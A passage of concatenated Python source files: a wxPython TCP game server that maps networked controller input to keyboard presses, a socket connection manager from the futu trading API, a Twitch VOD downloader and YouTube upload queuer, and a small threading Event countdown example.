self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, u"server is down", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText2.Wrap(-1)
bSizer11.Add(self.m_staticText2, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)
gbSizer1 = wx.GridBagSizer(0, 0)
gbSizer1.SetFlexibleDirection(wx.BOTH)
gbSizer1.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
self.m_staticText12 = wx.StaticText(self, wx.ID_ANY, u"Game 1", wx.Point(20, 20), wx.DefaultSize,
wx.ALIGN_CENTRE)
self.m_staticText12.Wrap(-1)
gbSizer1.Add(self.m_staticText12, wx.GBPosition(0, 0), wx.GBSpan(1, 1),
wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT, 5)
self.m_button2 = wx.Button(self, wx.ID_ANY, u"Set Game 1", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer1.Add(self.m_button2, wx.GBPosition(0, 1), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText14 = wx.StaticText(self, wx.ID_ANY, u"Player 1", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText14.Wrap(-1)
gbSizer1.Add(self.m_staticText14, wx.GBPosition(0, 2), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText4 = wx.StaticText(self, wx.ID_ANY, u"disconnected", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText4.Wrap(-1)
gbSizer1.Add(self.m_staticText4, wx.GBPosition(0, 3), wx.GBSpan(1, 1), wx.ALL, 5)
bSizer11.Add(gbSizer1, 1, wx.EXPAND, 5)
gbSizer11 = wx.GridBagSizer(0, 0)
gbSizer11.SetFlexibleDirection(wx.BOTH)
gbSizer11.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
self.m_staticText121 = wx.StaticText(self, wx.ID_ANY, u"Game 2", wx.Point(20, 20), wx.DefaultSize,
wx.ALIGN_CENTRE)
self.m_staticText121.Wrap(-1)
gbSizer11.Add(self.m_staticText121, wx.GBPosition(0, 0), wx.GBSpan(1, 1),
wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT, 5)
self.m_button3 = wx.Button(self, wx.ID_ANY, u"Set Game 2", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer11.Add(self.m_button3, wx.GBPosition(0, 1), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText141 = wx.StaticText(self, wx.ID_ANY, u"Player 1", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText141.Wrap(-1)
gbSizer11.Add(self.m_staticText141, wx.GBPosition(0, 2), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText5 = wx.StaticText(self, wx.ID_ANY, u"disconnected", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText5.Wrap(-1)
gbSizer11.Add(self.m_staticText5, wx.GBPosition(0, 3), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText40 = wx.StaticText(self, wx.ID_ANY, u"Player 2", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText40.Wrap(-1)
gbSizer11.Add(self.m_staticText40, wx.GBPosition(0, 4), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText6 = wx.StaticText(self, wx.ID_ANY, u"disconnected", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText6.Wrap(-1)
gbSizer11.Add(self.m_staticText6, wx.GBPosition(0, 5), wx.GBSpan(1, 1), wx.ALL, 5)
bSizer11.Add(gbSizer11, 1, wx.EXPAND, 5)
bSizer12 = wx.BoxSizer(wx.VERTICAL)
self.m_staticText57 = wx.StaticText(self, wx.ID_ANY, u"Game 2 Link: ", wx.DefaultPosition, wx.Size(50, -1), 0)
self.m_staticText57.Wrap(-1)
self.m_staticText57.SetMaxSize(wx.Size(100, -1))
bSizer12.Add(self.m_staticText57, 1, wx.ALL | wx.EXPAND, 5)
self.m_textCtrl12 = wx.TextCtrl(self, wx.ID_ANY, u"http://www.4399.com/flash/187228_1.htm", wx.DefaultPosition,
wx.DefaultSize, 0)
bSizer12.Add(self.m_textCtrl12, 0, wx.ALL | wx.EXPAND, 5)
bSizer11.Add(bSizer12, 1, wx.EXPAND, 5)
self.SetSizer(bSizer11)
self.Layout()
self.Centre(wx.BOTH)
# Connect Events
self.m_button1.Bind(wx.EVT_BUTTON, self.start_server)
self.m_button2.Bind(wx.EVT_BUTTON, self.set_game1)
self.m_button3.Bind(wx.EVT_BUTTON, self.set_game2)
def __del__(self):
pass
    # Virtual event handlers, override them in your derived class
def start_server(self, event):
frame.m_staticText2.SetLabel("Server is Running !!! ")
print("start server")
timer = threading.Timer(timer_period, fun_timer)
timer.start()
        # the first argument is the (host, port) pair
server = ThreadingTCPServer(('', port), EchoHandler)
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
        # sudo netstat -lntup | grep 20000
        # ps -ef | grep python   # list all running Python processes
        # kill -9 51976          # -9 force-kills the process; a plain `kill 51976` sometimes fails to stop it
def set_game1(self, event):
global mode
global mode_1_flag
global mode_2_flag
mode_1_flag = True
mode = 1
print("Mode 1")
for key,value in client_socket.items():
value.sendall(bytes([0x11,0x22,0x33]))
def set_game2(self, event):
global mode
global mode_1_flag
global mode_2_flag
mode_2_flag = True
mode = 2
print("Mode 2")
for key,value in client_socket.items():
try:
value.sendall(bytes([0x11, 0x22, 0x33]))
except IOError:
pass
else:
pass
m = PyMouse()
k = PyKeyboard()
from socketserver import BaseRequestHandler, TCPServer
buffer_size = 10
key_flag = False
import threading
timer_period = 0.1
def fun_timer():
global key_flag
#print('Hello Timer!')
key_flag = True
global timer
timer = threading.Timer(timer_period, fun_timer)
timer.start()
previous_key = 0
mode = 1
frame = None
mode_1_flag = False
mode_2_flag = False
d = {}
# Inherit from the BaseRequestHandler base class and override handle()
class EchoHandler(BaseRequestHandler):
def setup(self):
        ip = self.client_address[0].strip()  # client IP address
        port = self.client_address[1]  # client port
        print(ip + ":" + str(port) + " is connected!")
        client_addr.append(self.client_address)  # remember the client address
        client_socket[self.client_address] = self.request  # save the client socket
def finish(self):
print("client is disconnect!")
client_addr.remove(self.client_address)
del client_socket[self.client_addr]
def handle(self):
global key_flag
global previous_key
global mode_1_flag
global mode_2_flag
print('Got connection from', self.client_address)
print(type(self.request))
# self.request is the TCP socket connected to the client
count = 0
msg = []
while True:
            # read up to buffer_size bytes at a time
temp = self.request.recv(buffer_size)
msg.extend(temp)
while len(msg) >= 2 and (msg[0]!=0xa0 or msg[1]!=0xa1):
msg.pop(0)
if len(msg)<buffer_size:
continue
if not key_flag:
continue
up = msg[2]
down = msg[3]
left = msg[4]
right = msg[5]
node = msg[6]
if node == 1:
frame.m_staticText4.SetLabel("Connected !!! ")
frame.m_staticText5.SetLabel("Connected !!! ")
if node == 2:
frame.m_staticText6.SetLabel("Connected !!! ")
if mode == 1:
key = 0
if up and not left and not right:
key =1
if down and not left and not right:
key =2
if left:
key =3
if right:
key =4
if key != 0 and previous_key != key:
print(key)
if key == 1:
k.press_key("up")
print(" node 1 up")
# else:
# k.release_key("up")
if key == 2:
k.press_key("down")
print(" node 1 down")
# else:
# k.release_key("down")
if key == 3:
k.press_key("left")
print(" node 1 left")
# else:
# k.release_key("left")
if key == 4:
k.press_key("right")
print(" node 1 right")
# else:
# k.release_key("right")
previous_key = key
if mode == 2:
if node == 1:
if up == 1:
k.press_key("up")
print(" node 1 up")
else:
k.release_key("up")
if down == 1:
k.press_key("down")
print(" node 1 down")
else:
k.release_key("down")
if left == 1:
k.press_key("left")
print(" node 1 left")
else:
k.release_key("left")
if right == 1:
k.press_key("right")
print(" node 1 right")
else:
k.release_key("right")
if node == 2:
if up == 1:
k.press_key("w")
print(" node 2 up")
else:
k.release_key("w")
if down == 1:
k.press_key("s")
print(" node 2 down")
else:
k.release_key("s")
if left == 1:
k.press_key("a")
print(" node 2 left")
else:
k.release_key("a")
if right == 1:
k.press_key("d")
print(" node 2 right")
else:
k.release_key("d")
msg = []
#key_flag = False
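# Illustrative only (not part of the original game): a minimal client-side
# sketch of the framing EchoHandler expects. Each frame is `buffer_size` (10)
# bytes: a 0xa0 0xa1 header, then up/down/left/right/node flags, zero-padded.
# The default host value is an assumption for demonstration.
def _send_demo_frame(host='127.0.0.1', up=1, down=0, left=0, right=0, node=1):
    frame = bytes([0xa0, 0xa1, up, down, left, right, node, 0, 0, 0])
    s = socket(AF_INET, SOCK_STREAM)
    try:
        s.connect((host, port))  # `port` is the module-level 20000 defined above
        s.sendall(frame)
    finally:
        s.close()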
if __name__ == '__main__':
    app = wx.App()  # create the application object
    frame = MotionGame(None)  # instantiate the main window
    frame.Show()  # show the window
    app.MainLoop()  # start the main event loop
|
network_manager.py
|
import errno
from datetime import datetime
import threading
from time import sleep
from futu.common.utils import *
from futu.quote.quote_query import parse_head
from .err import Err
from .sys_config import SysConfig
from .ft_logger import *
if IS_PY2:
import selectors2 as selectors
import Queue as queue
else:
import queue
import selectors
class ConnStatus:
Start = 0
Connecting = 1
Connected = 2
Closed = 3
class SyncReqRspInfo:
def __init__(self):
self.event = threading.Event()
self.ret = RET_OK
self.msg = ''
self.data = None
class Connection:
def __init__(self, conn_id, sock, addr, handler):
self._conn_id = conn_id
self.opend_conn_id = 0
self.sock = sock
self.handler = handler
self._peer_addr = addr
self.status = ConnStatus.Start
self.keep_alive_interval = 10
self.last_keep_alive_time = datetime.now()
self.timeout = None
self.start_time = None
self.readbuf = bytearray()
self.writebuf = bytearray()
self.req_dict = {} # ProtoInfo -> req time
self.sync_req_dict = {} # ProtoInfo -> SyncReqRspInfo
@property
def conn_id(self):
return self._conn_id
@property
def peer_addr(self):
return self._peer_addr
def fileno(self):
return self.sock.fileno()
def is_socket_exception_wouldblock(e):
has_errno = False
if IS_PY2:
if isinstance(e, IOError):
has_errno = True
else:
if isinstance(e, OSError):
has_errno = True
if has_errno:
if e.errno == errno.EWOULDBLOCK or e.errno == errno.EAGAIN or e.errno == errno.EINPROGRESS:
return True
return False
def make_ctrl_socks():
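# Create a connected pair of sockets used only to wake up the selector loop.
# On Python 3, socket.socketpair() provides this directly; on Python 2 (where
# socketpair may be unavailable) it is emulated with a short-lived loopback listener.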
LOCAL_HOST = '127.0.0.1'
if IS_PY2:
svr_sock = []
lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def svr_sock_func():
try:
sock, _ = lsock.accept()
svr_sock.append(sock)
except Exception as e:
logger.warning('Ctrl sock fail: {}'.format(str(e)))
try:
lsock.bind((LOCAL_HOST, 0))
_, port = lsock.getsockname()[:2]
lsock.listen(1)
thread = threading.Thread(target=svr_sock_func)
thread.start()
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.settimeout(0.1)
client_sock.connect((LOCAL_HOST, port))
thread.join()
return svr_sock[0], client_sock
except Exception as e:
logger.warning('Ctrl sock fail: {}'.format(str(e)))
return None, None
finally:
lsock.close()
else:
return socket.socketpair()
class NetManager:
_default_inst = None
_default_inst_lock = threading.Lock()
@classmethod
def default(cls):
with cls._default_inst_lock:
if cls._default_inst is None:
cls._default_inst = NetManager()
return cls._default_inst
def __init__(self):
self._use_count = 0
self._lock = threading.RLock()
self._mgr_lock = threading.Lock() # Used to control start and stop
self._create_all()
def _close_all(self):
for sel_key in list(self._selector.get_map().values()):
self._selector.unregister(sel_key.fileobj)
sel_key.fileobj.close()
self._selector.close()
self._selector = None
if self._r_sock:
self._r_sock.close()
self._r_sock = None
if self._w_sock:
self._w_sock.close()
self._w_sock = None
def _create_all(self):
self._selector = selectors.DefaultSelector()
self._next_conn_id = 1
self._req_queue = queue.Queue()
self._sync_req_timeout = 12
self._thread = None
now = datetime.now()
self._last_activate_time = now
self._last_check_req_time = now
self._r_sock, self._w_sock = make_ctrl_socks()
self._selector.register(self._r_sock, selectors.EVENT_READ)
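# Work items (connect/send/close) are queued from other threads into _req_queue;
# writing a byte to _w_sock wakes the selector so poll() can run them promptly.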
def connect(self, addr, handler, timeout):
with self._lock:
conn_id = self._next_conn_id
self._next_conn_id += 1
def work():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)
conn = Connection(conn_id, sock, addr, handler)
conn.status = ConnStatus.Connecting
conn.start_time = datetime.now()
conn.timeout = timeout
sock.setblocking(False)
self._selector.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, conn)
try:
sock.connect(addr)
except Exception as e:
if not is_socket_exception_wouldblock(e):
conn.handler.on_error(conn.conn_id, str(e))
self.close(conn.conn_id)
return RET_ERROR, str(e), 0
return RET_OK, '', conn_id
self._req_queue.put(work)
self._w_sock.send(b'1')
return RET_OK, '', conn_id
def poll(self):
now = datetime.now()
events = self._selector.select(0.02)
for key, evt_mask in events:
if key.fileobj == self._r_sock:
self._r_sock.recv(1024)
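# A byte on the control socket only means "there is pending work":
# drain the wake-up bytes and run every queued work item.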
while True:
try:
work = self._req_queue.get(block=False)
work()
except queue.Empty:
break
continue
conn = key.data
if evt_mask & selectors.EVENT_WRITE != 0:
self._on_write(conn)
if evt_mask & selectors.EVENT_READ != 0:
self._on_read(conn)
activate_elapsed_time = now - self._last_activate_time
check_req_elapsed_time = now - self._last_check_req_time
is_activate = activate_elapsed_time.total_seconds() >= 0.05
is_check_req = check_req_elapsed_time.total_seconds() >= 0.1
if is_activate or is_check_req:
for key in list(self._selector.get_map().values()):
if key.fileobj == self._r_sock:
continue
conn = key.data
if conn.status == ConnStatus.Connecting:
if is_activate:
self._check_connect_timeout(conn, now)
elif conn.status == ConnStatus.Connected:
if is_activate:
conn.handler.on_activate(conn.conn_id, now)
if is_check_req:
self._check_req(conn, now)
if is_activate:
self._last_activate_time = now
if is_check_req:
self._last_check_req_time = now
def _check_connect_timeout(self, conn, now):
time_delta = now - conn.start_time
if conn.timeout is not None and conn.timeout > 0 and time_delta.total_seconds() >= conn.timeout:
self._on_connect_timeout(conn)
def _check_req(self, conn, now):
"""
:param conn:
:type conn: Connection
:param now:
:type now: datetime
:return:
"""
req_dict = dict(conn.req_dict.items())
for proto_info, req_time in req_dict.items(): # type: ProtoInfo, datetime
elapsed_time = now - req_time
if elapsed_time.total_seconds() >= self._sync_req_timeout:
self._on_packet(conn, proto_info._asdict(), Err.Timeout.code, Err.Timeout.text, None)
def _thread_func(self):
while True:
if not self.is_alive():
break
self.poll()
def start(self):
"""
Should be called from main thread
:return:
"""
with self._mgr_lock:
with self._lock:
self._use_count += 1
if self._thread is None:
self._create_all()
self._thread = threading.Thread(target=self._thread_func)
self._thread.setDaemon(SysConfig.get_all_thread_daemon())
self._thread.start()
def stop(self):
with self._mgr_lock:
is_quit = False
with self._lock:
self._use_count = max(self._use_count - 1, 0)
is_quit = not self.is_alive()
if is_quit and self._thread is not None:
self._thread.join()
self._close_all()
self._thread = None
def is_alive(self):
with self._lock:
return self._use_count > 0
def do_send(self, conn_id, proto_info, data):
logger.debug('Send: conn_id={}; proto_id={}; serial_no={}; total_len={};'.format(conn_id, proto_info.proto_id,
proto_info.serial_no,
len(data)))
now = datetime.now()
ret_code = RET_OK
msg = ''
conn = self._get_conn(conn_id) # type: Connection
sync_req_rsp = None
if not conn:
logger.debug(
FTLog.make_log_msg('Send fail', conn_id=conn_id, proto_id=proto_info.proto_id, serial_no=proto_info.serial_no,
msg=Err.ConnectionLost.text))
ret_code, msg = RET_ERROR, Err.ConnectionLost.text
else:
sync_req_rsp = conn.sync_req_dict.get(proto_info, None)
if ret_code != RET_OK:
return ret_code, msg
if conn.status != ConnStatus.Connected:
ret_code, msg = RET_ERROR, Err.NotConnected.text
if ret_code != RET_OK:
logger.warning(FTLog.make_log_msg('Send fail', proto_id=proto_info.proto_id, serial_no=proto_info.serial_no,
conn_id=conn_id, msg=msg))
if sync_req_rsp:
sync_req_rsp.ret, sync_req_rsp.msg = RET_ERROR, msg
sync_req_rsp.event.set()
return ret_code, msg
conn.req_dict[proto_info] = now
size = 0
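# If earlier data is still buffered, append to the write buffer to preserve ordering;
# otherwise attempt a direct send and buffer whatever could not be sent, letting the
# EVENT_WRITE handler flush it later.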
try:
if len(conn.writebuf) > 0:
conn.writebuf.extend(data)
else:
size = conn.sock.send(data)
except Exception as e:
if is_socket_exception_wouldblock(e):
pass
else:
ret_code, msg = RET_ERROR, str(e)
if size > 0 and size < len(data):
conn.writebuf.extend(data[size:])
self._watch_write(conn, True)
if ret_code != RET_OK:
logger.warning(FTLog.make_log_msg('Send error', conn_id=conn_id, msg=msg))
if sync_req_rsp:
sync_req_rsp.ret, sync_req_rsp.msg = RET_ERROR, msg
sync_req_rsp.event.set()
return ret_code, msg
return RET_OK, ''
def send(self, conn_id, data):
"""
:param conn_id:
:param data:
:return:
"""
proto_info = self._parse_req_head_proto_info(data)
def work():
self.do_send(conn_id, proto_info, data)
self._req_queue.put(work)
self._w_sock.send(b'1')
return RET_OK, None
def close(self, conn_id):
def work():
conn = self._get_conn(conn_id) # type: Connection
if not conn:
return
if conn.sock is None:
return
self._watch_read(conn, False)
self._watch_write(conn, False)
conn.sock.close()
conn.sock = None
conn.status = ConnStatus.Closed
for proto_info, sync_req_rsp in conn.sync_req_dict.items(): # type: ProtoInfo, SyncReqRspInfo
sync_req_rsp.ret = RET_ERROR
sync_req_rsp.msg = Err.ConnectionClosed.text
sync_req_rsp.event.set()
self._req_queue.put(work)
self._w_sock.send(b'1')
def _watch_read(self, conn, is_watch):
try:
sel_key = self._selector.get_key(conn.sock)
except KeyError:
return
if is_watch:
new_event = sel_key.events | selectors.EVENT_READ
else:
new_event = sel_key.events & (~selectors.EVENT_READ)
if new_event != 0:
self._selector.modify(conn.sock, new_event, conn)
else:
self._selector.unregister(conn.sock)
def _watch_write(self, conn, is_watch):
try:
sel_key = self._selector.get_key(conn.sock)
except KeyError:
return
if is_watch:
new_event = sel_key.events | selectors.EVENT_WRITE
else:
new_event = sel_key.events & (~selectors.EVENT_WRITE)
if new_event != 0:
self._selector.modify(conn.sock, new_event, conn)
else:
self._selector.unregister(conn.sock)
def sync_query(self, conn_id, req_str):
head_dict = self._parse_req_head(req_str)
proto_info = ProtoInfo(head_dict['proto_id'], head_dict['serial_no'])
rsp_info = SyncReqRspInfo()
def work():
conn = self._get_conn(conn_id) # type: Connection
ret, msg = RET_OK, ''
if not conn:
ret = RET_ERROR
msg = Err.ConnectionLost.text
else:
conn.sync_req_dict[proto_info] = rsp_info
self.do_send(conn_id, proto_info, req_str)
if ret != RET_OK:
rsp_info.ret = ret
rsp_info.msg = msg
rsp_info.event.set()
self._req_queue.put(work)
self._w_sock.send(b'1')
rsp_info.event.wait()
return rsp_info.ret, rsp_info.msg, rsp_info.data
def _parse_req_head(self, req_str):
head_len = get_message_head_len()
req_head_dict = parse_head(req_str[:head_len])
return req_head_dict
def _parse_req_head_proto_info(self, req_str):
head_len = get_message_head_len()
proto_info = parse_proto_info(req_str[:head_len])
return proto_info
def _get_conn(self, conn_id):
for sock, sel_key in self._selector.get_map().items():
if sel_key.fileobj == self._r_sock:
continue
conn = sel_key.data
if conn.conn_id == conn_id:
return conn
return None
def _on_read(self, conn):
start_time = time.time()
recv_len = 0
buf_len = 0
packet_count = 0
if conn.status == ConnStatus.Closed:
return
err = None
is_closed = False
try:
data = conn.sock.recv(128 * 1024)
if data == b'':
is_closed = True
else:
conn.readbuf.extend(data)
recv_len = len(data)
buf_len = len(conn.readbuf)
except Exception as e:
if not is_socket_exception_wouldblock(e):
err = str(e)
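# Extract complete packets from the read buffer: parse the fixed-size head to get
# body_len, and stop as soon as the buffer holds less than a full head + body.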
while len(conn.readbuf) > 0:
head_len = get_message_head_len()
if len(conn.readbuf) < head_len:
break
head_dict = parse_head(conn.readbuf[:head_len])
body_len = head_dict['body_len']
if len(conn.readbuf) < head_len + body_len:
break
rsp_body = conn.readbuf[head_len:head_len+body_len]
del conn.readbuf[:head_len+body_len]
packet_count += 1
self._on_packet(conn, head_dict, Err.Ok.code, '', rsp_body)
if is_closed:
self.close(conn.conn_id)
conn.handler.on_error(conn.conn_id, Err.ConnectionClosed.text)
elif err:
self.close(conn.conn_id)
conn.handler.on_error(conn.conn_id, err)
end_time = time.time()
logger.debug('conn_id={}; elapsed={}; recv_len={}; buf_len={}; packet={};'.format(conn.conn_id, end_time-start_time, recv_len, buf_len, packet_count))
def _on_write(self, conn):
if conn.status == ConnStatus.Closed:
return
elif conn.status == ConnStatus.Connecting:
err = conn.sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
self._watch_write(conn, False)
if err != 0:
conn.handler.on_error(conn.conn_id, errno.errorcode[err])
else:
conn.status = ConnStatus.Connected
conn.handler.on_connected(conn.conn_id)
return
err = None
size = 0
try:
if len(conn.writebuf) > 0:
size = conn.sock.send(conn.writebuf)
except Exception as e:
if not is_socket_exception_wouldblock(e):
err = str(e)
if size > 0:
del conn.writebuf[:size]
if len(conn.writebuf) == 0:
self._watch_write(conn, False)
if err:
self.close(conn.conn_id)
conn.handler.on_error(conn.conn_id, err)
def _on_connect_timeout(self, conn):
conn.handler.on_connect_timeout(conn.conn_id)
def _on_packet(self, conn, head_dict, err_code, msg, rsp_body_data):
"""
:param conn:
:type conn: Connection
:param head_dict:
:param err_code:
:param msg:
:param rsp_body_data:
:return:
"""
proto_info = ProtoInfo(head_dict['proto_id'], head_dict['serial_no'])
rsp_pb = None
if err_code == Err.Ok.code:
ret_decrypt, msg_decrypt, rsp_body = decrypt_rsp_body(rsp_body_data, head_dict, conn.opend_conn_id)
if ret_decrypt == RET_OK:
rsp_pb = binary2pb(rsp_body, head_dict['proto_id'], head_dict['proto_fmt_type'])
else:
err_code = Err.PacketDataErr.code
msg = msg_decrypt
rsp_pb = None
log_msg = 'Recv: conn_id={}; proto_id={}; serial_no={}; data_len={}; msg={};'.format(conn.conn_id,
proto_info.proto_id,
proto_info.serial_no,
len(
rsp_body_data) if rsp_body_data else 0,
msg)
if err_code == Err.Ok.code:
logger.debug(log_msg)
else:
logger.warning(log_msg)
ret_code = RET_OK if err_code == Err.Ok.code else RET_ERROR
sync_rsp_info = conn.sync_req_dict.get(proto_info, None) # type: SyncReqRspInfo
conn.req_dict.pop(proto_info, None)
if sync_rsp_info:
sync_rsp_info.ret, sync_rsp_info.msg, sync_rsp_info.data = ret_code, msg, rsp_pb
sync_rsp_info.event.set()
conn.sync_req_dict.pop(proto_info)
else:
conn.handler.on_packet(conn.conn_id, proto_info, ret_code, msg, rsp_pb)
@staticmethod
def extract_rsp_pb(opend_conn_id, head_dict, rsp_body):
ret, msg, rsp = decrypt_rsp_body(rsp_body, head_dict, opend_conn_id)
if ret == RET_OK:
rsp_pb = binary2pb(rsp_body, head_dict['proto_id'], head_dict['proto_fmt_type'])
else:
rsp_pb = None
return ret, msg, rsp_pb
def set_conn_info(self, conn_id, info):
with self._lock:
conn = self._get_conn(conn_id)
if conn is not None:
conn.opend_conn_id = info.get('conn_id', conn.opend_conn_id)
conn.keep_alive_interval = info.get('keep_alive_interval', conn.keep_alive_interval)
else:
return RET_ERROR, Err.ConnectionLost.text
return RET_OK, ''
|
vodloader_video.py
|
from vodloader_chapters import vodloader_chapters
from threading import Thread
from math import floor
import logging
import os
import datetime
import streamlink
import requests
import json
import pytz
class vodloader_video(object):
def __init__(self, parent, url, twitch_data, backlog=False, quality='best', part=1):
self.parent = parent
self.logger = logging.getLogger(f'vodloader.{self.parent.channel}.video')
self.part = part
self.backlog = backlog
self.quality = quality
self.passed = False
self.upload = self.parent.upload
self.keep = self.parent.keep
self.twitch_data = twitch_data
if backlog:
self.start_absolute = twitch_data['created_at']
self.id = twitch_data['stream_id']
self.vod_id = twitch_data['id']
else:
self.start_absolute = twitch_data['started_at']
self.id = twitch_data['id']
self.start_absolute = pytz.timezone('UTC').localize(datetime.datetime.strptime(self.start_absolute, '%Y-%m-%dT%H:%M:%SZ'))
self.start_absolute = self.start_absolute.astimezone(self.parent.tz)
self.start = datetime.datetime.now()
self.download_url = url
name = self.id
if self.part > 1:
name += f'.p{self.part}'
self.id += f'p{self.part}'
name += '.ts'
self.path = os.path.join(self.parent.download_dir, name)
self.chapters = self.chapters_init(twitch_data)
self.thread = Thread(target=self.buffload_stream, args=(), daemon=True)
self.thread.start()
def chapters_init(self, twitch_data):
if self.backlog:
chapters = self.get_vod_chapters()
else:
chapters = vodloader_chapters(twitch_data['game_name'], twitch_data['title'])
return chapters
def __del__(self):
pass
def get_stream(self, url, quality):
return streamlink.streams(url)[quality]
def buffload_stream(self):
if self.id not in self.parent.status:
self.download_stream()
if self.upload and self.parent.status[self.id] != True:
self.upload_stream()
def download_stream(self, chunk_size=8192, max_length=60*(60*12-15), retry=10):
self.logger.info(f'Downloading stream from {self.download_url} to {self.path}')
stream = self.get_stream(self.download_url, self.quality)
buff = stream.open()
if self.backlog:
seglen = buff.worker.playlist_sequences[0].segment.duration
seq_limit = floor(max_length/seglen) * self.part
if self.part > 1:
buff.close()
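# For parts after the first, skip ahead in the VOD: start roughly where the previous
# part ended, backed off by a segment-length based margin (the exact overlap is an
# approximation derived from the playlist's segment duration).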
stream.start_offset = (self.part - 1) * (max_length - 60 * seglen * (self.part - 1))
buff = stream.open()
error = 0
with open(self.path, 'wb') as f:
data = buff.read(chunk_size)
while data and error < retry:
if self.parent.end:
buff.close()
exit()
try:
f.write(data)
data = buff.read(chunk_size)
except OSError as err:
self.logger.error(err)
error += 1
if self.backlog:
should_pass = buff.worker.playlist_sequence > (seq_limit - 2)
should_close = buff.worker.playlist_sequence > seq_limit
else:
should_pass = (datetime.datetime.now() - self.start).seconds > (max_length-15)
should_close = (datetime.datetime.now() - self.start).seconds > max_length
if should_pass and not self.passed:
self.passed = True
self.logger.info(f'Max length of {max_length} seconds has been exceeded for {self.path}, continuing download in part {self.part+1}')
twitch_data = self.twitch_data.copy()
twitch_data['game_name'] = self.chapters.get_current_game()
twitch_data['title'] = self.chapters.get_current_title()
if self.backlog:
self.parent.backlog_video = vodloader_video(self.parent, self.download_url, twitch_data, backlog=self.backlog, quality=self.quality, part=self.part+1)
else:
self.parent.livestream = vodloader_video(self.parent, self.download_url, twitch_data, backlog=self.backlog, quality=self.quality, part=self.part+1)
if should_close:
buff.close()
break
buff.close()
self.parent.status[self.id] = False
self.parent.status.save()
self.logger.info(f'Finished downloading stream from {self.download_url}')
def upload_stream(self, chunk_size=4194304, retry=3):
self.parent.uploader.queue.append((self.path, self.get_youtube_body(self.parent.chapters_type), self.id, self.keep))
def get_youtube_body(self, chapters=False):
tvid = f'tvid:{self.id}'
if self.part == 1 and self.passed: tvid += f'p{self.part}'
body = {
'snippet': {
'title': self.get_formatted_string(self.parent.uploader.youtube_args['title'], self.start_absolute),
'description': self.get_formatted_string(self.parent.uploader.youtube_args['description'], self.start_absolute),
'tags': [tvid]
},
'status': {
'selfDeclaredMadeForKids': False
}
}
if 'tags' in self.parent.uploader.youtube_args: body['snippet']['tags'] += self.parent.uploader.youtube_args['tags']
if 'categoryId' in self.parent.uploader.youtube_args: body['snippet']['categoryId'] = self.parent.uploader.youtube_args['categoryId']
if 'privacy' in self.parent.uploader.youtube_args: body['status']['privacyStatus'] = self.parent.uploader.youtube_args['privacy']
if not self.backlog:
body['snippet']['tags'] += self.chapters.get_games()
if chapters:
if chapters.lower() == 'games' and self.chapters.get_game_chapters():
body['snippet']['description'] += f'\n\n\n\n{self.chapters.get_game_chapters()}'
if chapters.lower() == 'titles' and self.chapters.get_title_chapters():
body['snippet']['description'] += f'\n\n\n\n{self.chapters.get_title_chapters()}'
if self.part > 1:
body['snippet']['title'] = f'{body["snippet"]["title"]} Part {self.part}'
body['snippet']['title'] = self.filter_string(body['snippet']['title'])
body['snippet']['description'] = self.filter_string(body['snippet']['description'])
return body
@staticmethod
def filter_string(s):
nono_chars = '<>|'
return ''.join([x for x in s if x not in nono_chars])
def get_formatted_string(self, input, date):
output = input.replace('%C', self.parent.channel)
output = output.replace('%i', self.id)
output = output.replace('%g', self.chapters.get_first_game())
output = output.replace('%G', self.chapters.get_current_game())
output = output.replace('%t', self.chapters.get_first_title())
output = output.replace('%T', self.chapters.get_current_title())
output = date.strftime(output)
return output
def get_stream_markers(self, retry=3):
url = f'https://api.twitch.tv/kraken/videos/{self.vod_id}/markers?api_version=5&client_id={self.parent.twitch.app_id}'
for i in range(retry):
r = requests.get(url)
if r.status_code == 200:
return json.loads(r.content)
return None
def get_video(self, retry=3):
url = f'https://api.twitch.tv/kraken/videos/{self.vod_id}?api_version=5&client_id={self.parent.twitch.app_id}'
for i in range(retry):
r = requests.get(url)
if r.status_code == 200:
return json.loads(r.content)
return None
def get_vod_chapters(self):
video = self.get_video()
chapters = vodloader_chapters(video['game'], video['title'])
offset = 0
response = self.get_stream_markers()
if 'markers' in response and 'game_changes' in response['markers'] and response['markers']['game_changes']:
for marker in response['markers']['game_changes']:
offset += marker['time']
chapters.timestamps.append((chapters.get_timestamp_from_sec(offset), marker['label'], video['title']))
return chapters
|
02_islaunch_thread.py
|
from threading import Thread, Event
import time
# Code to execute in an independent thread
def countdown(n, started_evt):
time.sleep(10)
print('countdown starting')
# set the event to signal that the thread has started
started_evt.set()
while n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
# Create the event object that will be used to signal startup
started_evt = Event()
# Launch the thread and pass the startup event
print('Launching countdown')
t = Thread(target=countdown, args=(10,started_evt))
t.start()
# Wait for the thread to start; this blocks the main thread until the event is set
started_evt.wait()
print('countdown is running')
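# Note: started_evt.wait() blocks indefinitely. Event.wait() also accepts a timeout in
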